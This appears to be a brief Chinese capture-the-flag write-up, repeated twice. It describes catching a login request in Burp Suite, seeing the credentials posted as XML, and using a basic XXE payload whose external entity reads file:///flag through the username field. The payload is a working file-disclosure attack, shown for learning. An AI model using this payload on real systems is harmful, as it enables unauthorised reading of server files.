bp抓包观察,username和password是以xml文件形式post的
学习从XML相关一步一步到XXE漏洞
用最基本的XXE攻击
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY user SYSTEM "file:///flag">
]>
<user><username>&user;</username><password>123</password></user>
bp抓包观察,username和password是以xml文件形式post的
学习从XML相关一步一步到XXE漏洞
用最基本的XXE攻击
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY user SYSTEM "file:///flag">
]>
<user><username>&user;</username><password>123</password></user>